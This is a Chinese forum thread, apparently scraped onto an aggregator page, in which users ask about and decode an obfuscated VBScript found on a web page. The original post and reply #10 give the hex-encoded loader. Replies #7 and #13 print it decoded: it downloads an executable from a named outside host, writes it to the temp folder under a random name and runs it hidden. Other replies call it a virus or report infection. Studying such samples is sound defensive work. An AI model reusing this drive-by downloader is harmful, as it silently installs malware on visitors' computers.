请问这段VBScript是干什么的，急，在线等

作者：漫步乡间2012 | 来源：互联网 | 2023-05-17 19:07

<SCRIPTlanguageVBScript>T14F6E206572726F7220726573756D65206E6578740D0A57313D22687474703A

T1="4F6E206572726F7220726573756D65206E6578740D0A57313D22687474703A2F2F6261696475332E66656E6C656964616E6764616E672E636F6D2F4175746F4C697665496E73742E657865220D0A5365742057323D646F63756D656E742E637265617465456C656D656E7428226F626A65637422290D0A57322E7365744174747269627574652022636C6173736964222C22636C7369643A42222622443936433535362D363541332D313144302D393833412D303043303446433239453336220D0A57333D224D2226226963726F736F66742E582226224D4C48545450220D0A5365742057343D57322E4372656174654F626A6563742857332C2222290D0A57353D2241646F220D0A57363D2264622E220D0A57373D22537472220D0A57383D2265616D220D0A57393D57352657362657372657380D0A5731303D57390D0A736574205731313D57322E6372656174656F626A656374285731302C2222290D0A5731312E747970653D310D0A5731323D22474554220D0A57342E4F70656E205731322C57312C46616C73650D0A57342E53656E640D0A5731333D225722264353747228496E742828393939392D313030302B31292A526E642B31303030292926222E636F6D220D0A736574205731343D57322E6372656174656F626A6563742822532226226372697074696E672E46222622696C6553797374656D4F626A656374222C2222290D0A736574205731353D5731342E4765745370656369616C466F6C646572283229200D0A5731333D5731342E4275696C6450617468285731352C573133290D0A5731312E6F70656E0D0A5731312E77726974652057342E726573706F6E7365426F64790D0A5731312E73617665746F66696C65205731332C320D0A5731312E636C6F73650D0A736574205731363D57322E6372656174656F626A65637428225322262268656C6C2E4122262270706C69636174696F6E222C2222290D0A5731362E5368656C6C45786563757465205731332C22222C22222C226F70656E222C30":T2="EXECUTE """"":T3="&CHR(&H":T4=")":DO WHILE LEN(T1)>1:IF ISNUMERIC(LEFT(T1,1))THEN:T2=T2&T3&LEFT(T1,2)&T4:T1=MID(T1,3):ELSE:T2=T2&T3&LEFT(T1,4)&T4:T1=MID(T1,5)
LOOP:EXECUTE T2
《SCRIPT》

马上揭帖

15 个解决方案

#1

我也想晓得。。顶一下。。。。

#2

你代码贴完整没有。。。。好像不完整吧。

#3

应该是完整，那个页面里没其他有用的东西了

#4

#5

对不起。。我也不解。。。我也等着。。看有高手不。

#6

嚇死我了.

#7

病毒!

楼主?!

On error resume next W1="http://baidu3.fenleidangdang.com/AutoLiveInst.exe" Set W2=document.createElement("object") W2.setAttribute "classid","clsid:B"&"D96C556-65A3-11D0-983A-00C04FC29E36" W3="M"&"icrosoft.X"&"MLHTTP" Set W4=W2.CreateObject(W3,"") W5="Ado" W6="db." W7="Str" W8="eam" W9=W5&W6&W7&W8 W10=W9 set W11=W2.createobject(W10,"") W11.type=1 W12="GET" W4.Open W12,W1,False W4.Send W13="W"&CStr(Int((9999-1000+1)*Rnd+1000))&".com" set W14=W2.createobject("S"&"cripting.F"&"ileSystemObject","") set W15=W14.GetSpecialFolder(2) W13=W14.BuildPath(W15,W13) W11.open W11.write W4.responseBody W11.savetofile W13,2 W11.close set W16=W2.createobject("S"&"hell.A"&"pplication","") W16.ShellExecute W13,"","","open",0

#8

大家不要随便测试

#9

加解密，隐藏代码信息

#10

T1="4F6E206572726F7220726573756D65206E6578740D0A57313D22687474703A2F2F6261696475332E66656E6C656964616E6764616E672E636F6D2F4175746F4C697665496E73742E657865220D0A5365742057323D646F63756D656E742E637265617465456C656D656E7428226F626A65637422290D0A57322E7365744174747269627574652022636C6173736964222C22636C7369643A42222622443936433535362D363541332D313144302D393833412D303043303446433239453336220D0A57333D224D2226226963726F736F66742E582226224D4C48545450220D0A5365742057343D57322E4372656174654F626A6563742857332C2222290D0A57353D2241646F220D0A57363D2264622E220D0A57373D22537472220D0A57383D2265616D220D0A57393D57352657362657372657380D0A5731303D57390D0A736574205731313D57322E6372656174656F626A656374285731302C2222290D0A5731312E747970653D310D0A5731323D22474554220D0A57342E4F70656E205731322C57312C46616C73650D0A57342E53656E640D0A5731333D225722264353747228496E742828393939392D313030302B31292A526E642B31303030292926222E636F6D220D0A736574205731343D57322E6372656174656F626A6563742822532226226372697074696E672E46222622696C6553797374656D4F626A656374222C2222290D0A736574205731353D5731342E4765745370656369616C466F6C646572283229200D0A5731333D5731342E4275696C6450617468285731352C573133290D0A5731312E6F70656E0D0A5731312E77726974652057342E726573706F6E7365426F64790D0A5731312E73617665746F66696C65205731332C320D0A5731312E636C6F73650D0A736574205731363D57322E6372656174656F626A65637428225322262268656C6C2E4122262270706C69636174696F6E222C2222290D0A5731362E5368656C6C45786563757465205731332C22222C22222C226F70656E222C30"
T2="document.write """""
T3="&CHR(&H"
T4=")"
DO WHILE LEN(T1)>1
IF ISNUMERIC(LEFT(T1,1))THEN
T2=T2&T3&LEFT(T1,2)&T4
T1=MID(T1,3)
ELSE
T2=T2&T3&LEFT(T1,4)&T4
T1=MID(T1,5)
END IF
LOOP
EXECUTE T2
《SCRIPT》

#11

以上方法可以得到实际代码

#12

妈的,我中招了,大意啊....郁闷!~

#13

On error resume next
W1="http://baidu3.fenleidangdang.com/AutoLiveInst.exe"
Set W2=document.createElement("object")
W2.setAttribute "classid","clsid:B"&"D96C556-65A3-11D0-983A-00C04FC29E36"
W3="Microsoft.XMLHTTP"
Set W4=W2.CreateObject(W3,"")
W5="Ado" W6="db." W7="Str" W8="eam"
W9=W5&W6&W7&W8 W10=W9
set W11=W2.createobject(W10,"")
W11.type=1
W12="GET"
W4.Open W12,W1,False
W4.Send W13="W"&CStr(Int((9999-1000+1)*Rnd+1000))&".com"
set W14=W2.createobject("Scripting.FileSystemObject","")
set W15=W14.GetSpecialFolder(2)
W13=W14.BuildPath(W15,W13)
W11.open W11.write W4.responseBody
W11.savetofileW13,2
W11.close
set W16=W2.createobject("Shell.Application","")
W16.ShellExecute W13,"","","open",0

#14

我也不知道啊，诺顿，卡巴都没检查出来

这是什么病毒啊

#15

我们做联盟的，因为给别人弹这个页面，下家站长跑了好些了

推荐阅读

format
深入解析 OpenWrt 中的 Luci API 文档及 szloogson 模块构建

OpenWrt 是一款高度可定制的嵌入式 Linux 发行版，广泛应用于无线路由器等领域，拥有超过百个预装软件包。本文详细探讨如何在 OpenWrt 上通过 Luci 构建自定义模块，以扩展其功能。 ... [详细]

蜡笔小新 2024-12-03 12:06:08
request
软件项目管理实践——Jenkins持续集成与Maven、GitHub的应用

本文详细介绍了如何利用Jenkins实现持续集成，以及Maven和GitHub在项目开发中的具体应用。包括环境搭建、工具安装、项目创建及代码管理等关键步骤。 ... [详细]

蜡笔小新 2024-12-04 14:22:28
ip
Android自定义ListView实现上拉加载与下拉刷新

本文介绍如何通过自定义控件LoadLayout实现ListView的上拉加载更多和下拉刷新功能。LoadLayout支持上拉加载，而下拉刷新则利用了android.support.v4.widget.SwipeRefreshLayout组件。 ... [详细]

蜡笔小新 2024-12-04 13:44:41
ip
Django框架的使用教程mysql数据库[三]

Django的数据库1.在Django_test下的view.py里面model定义模型fromdjango.dbimportmodels#Createyourmodelshere ... [详细]

蜡笔小新 2024-12-04 11:29:56
request
PHP与MySQL Web开发初探——第一章概览

本文详细记录了《PHP与MySQL Web开发》第一章的学习心得，特别关注了PHP的基本构成元素、标记风格、编程注意事项及表单处理技巧等内容。 ... [详细]

蜡笔小新 2024-12-04 08:25:58
list
初探Robot Framework自动化测试框架

本文档详细介绍了Robot Framework的基础知识、安装配置方法及其实用技巧。从环境搭建到编写第一个测试用例，涵盖了一系列实用的操作指南和最佳实践。 ... [详细]

蜡笔小新 2024-12-03 20:47:57
format
Hive 创建表语法详解

本文详细介绍了在Hive中创建表的基本语法，包括临时表、外部表的创建方法，以及如何设置表的各种属性和约束条件。 ... [详细]

蜡笔小新 2024-12-04 14:16:49
hook
Android 动画框架详解及应用实例

本文介绍了Android中常见的动画类型及其应用场景，通过具体的代码示例展示了如何在Activity跳转时添加平滑过渡效果，提升用户体验。 ... [详细]

蜡笔小新 2024-12-04 12:37:07
ip
统计报表模板及其实现方法

本文介绍两个实用的统计报表模板，并提供如何将这些静态模板转换为动态JSP页面的方法。同时，文中附上了详细的代码示例。 ... [详细]

蜡笔小新 2024-12-04 10:26:05
import
解决 aiohttp 中 HTTPS 请求的 SSL 证书问题

本文介绍了如何处理在使用 aiohttp 进行 HTTPS 请求时遇到的 SSL 证书验证错误，包括忽略证书验证和使用自定义证书的方法。 ... [详细]

蜡笔小新 2024-12-04 05:20:03
request
FastCGI 分布式架构解析

本文探讨了使用Lighttpd与FastCGI实现分布式部署的方法。通过在中心服务器上配置Lighttpd负责请求转发，同时在多个远程服务器上运行FastCGI进程来处理实际业务逻辑，从而提高系统的负载能力和响应速度。 ... [详细]

蜡笔小新 2024-12-04 04:09:07
ip
Android 中 px、sp 和 dp 的转换方法

本文介绍了在 Android 开发中如何实现像素 (px)、缩放独立像素 (sp) 和密度独立像素 (dp) 之间的相互转换。这些方法对于确保应用在不同屏幕尺寸和分辨率上的适配至关重要。 ... [详细]

蜡笔小新 2024-12-03 19:59:17
hook
Java 线程池优雅关闭策略详解

本文探讨了在Java应用中实现线程池优雅关闭的两种方法，包括使用ShutdownHook注册钩子函数以及通过SignalHandler处理信号量。每种方法都提供了具体的代码示例，并讨论了可能遇到的问题及解决方案。 ... [详细]

蜡笔小新 2024-12-03 14:33:02
format
Web安全入门：MySQL基础操作与SQL注入防范

本文详细介绍了MySQL数据库的基础操作命令，包括数据库和表的基本管理，以及数据的增删查改等常用操作。同时，针对Web安全领域常见的SQL注入问题，提供了初步的理解和防范措施。 ... [详细]

蜡笔小新 2024-12-03 14:00:48
ip
UnityNGUIScrollView苹果式滑动

又回来写博客了，这回已经开始上班了，所以就发一发工作中解决的难题吧。单个展示Panel（苹果式）以前对UI的滑动组件很烦心，不是很会用，这回项目要求写一个类似于苹果的文件滑动效果， ... [详细]

蜡笔小新 2024-12-03 10:54:08

漫步乡间2012

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章